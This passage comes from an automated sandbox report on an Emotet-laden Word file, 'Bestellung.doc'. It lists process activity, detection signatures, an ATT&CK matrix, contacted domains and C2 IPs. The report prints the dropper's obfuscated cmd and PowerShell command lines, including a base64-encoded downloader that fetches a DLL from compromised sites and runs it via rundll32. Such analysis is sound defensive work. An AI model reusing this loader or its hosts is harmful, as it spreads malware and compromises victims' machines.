gBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2340431791.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2098274054.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2098491144.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2099699413.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2099787723.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103402652.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2340448062.0000000000330000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.330000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.890000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.890000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.330000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemorySystem Information Discovery15Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter211Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSSecurity Software Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol15Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 344273 Sample: Bestellung.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 13 other signatures 2->57 11 cmd.exe 2->11         started        14 WINWORD.EXE 293 24 2->14         started        process3 signatures4 61 Suspicious powershell command line found 11->61 63 Very long command line found 11->63 65 Encrypted powershell cmdline option found 11->65 16 powershell.exe 16 11 11->16         started        20 msg.exe 11->20         started        process5 dnsIp6 37 traumfrauen-ukraine.de 212.227.200.73, 443, 49170, 49171 ONEANDONE-ASBrauerstrasse48DE Germany 16->37 39 e-wdesign.eu 45.138.97.75, 49169, 80 M247GB Germany 16->39 41 3 other IPs or domains 16->41 35 C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll, data 16->35 dropped 22 rundll32.exe 16->22         started        file7 process8 process9 24 rundll32.exe 22->24         started        process10 26 rundll32.exe 2 24->26         started        signatures11 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->59 29 rundll32.exe 26->29         started        process12 process13 31 rundll32.exe 9 29->31         started        dnsIp14 43 110.172.180.180, 49179, 8080 WORLDPHONE-INASNumberforInterdomainRoutingIN India 31->43 45 132.248.38.158, 49177, 49178, 80 UniversidadNacionalAutonomadeMexicoMX Mexico 31->45 47 5 other IPs or domains 31->47 49 System process connects to network (likely due to code injection or exploit) 31->49 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Bestellung.doc53%VirustotalBrowse
                      Bestellung.doc11%ReversingLabsDocument-Word.Trojan.Emotet

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.230000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.230000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      shop.nowfal.dev7%VirustotalBrowse
                      traumfrauen-ukraine.de5%VirustotalBrowse
                      e-wdesign.eu6%VirustotalBrowse
                      nightlifemumbai.club5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://nightlifemumbai.club/x/0wBD3/100%Avira URL Cloudmalware
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://nightlifemumbai.club0%Avira URL Cloudsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/P0%Avira URL Cloudsafe
